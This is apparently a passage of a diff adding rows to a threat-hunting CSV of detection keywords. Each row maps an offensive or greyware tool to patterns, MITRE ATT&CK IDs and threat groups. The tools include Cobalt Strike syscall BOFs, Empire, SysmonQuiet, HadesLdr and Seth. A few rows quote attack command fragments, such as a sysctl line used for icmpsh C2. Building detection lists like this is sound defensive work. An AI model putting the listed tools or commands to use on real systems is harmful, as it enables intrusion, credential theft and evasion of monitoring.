+"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*sync-starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*synergy_httpx.py*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities 
such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
+"*Synergy-httpx-main*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
+"*syscall * out of bounds*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*syscall not permitted:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*syscall validate failed:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*syscall_disable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*syscall_enable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*syscalls.asm*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syscalls.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*syscalls_dump.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_inject *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_inject.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_shinject *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_shspawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_spawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_spawn.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsapcspawn.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls-asm.h*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syscallsdump.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsinject.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsspawn.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallStuff.asm*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*sysctl -w net.ipv4.icmp_echo_ignore_all=1*","greyware_tool_keyword","sysctl","Disable echo reply for icmpsh C2","T1040 - T1095 - T1090.001","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","0","N/A","4","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*sysdream/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*Sysmon is being suffocated*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
+"*Sysmon is quiet now!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
+"*sysmonquiet.*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
+"*SysmonQuiet-main*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
+"*SySS-Research*","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*system rm -f /current/tmp/ftshell.latest*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 
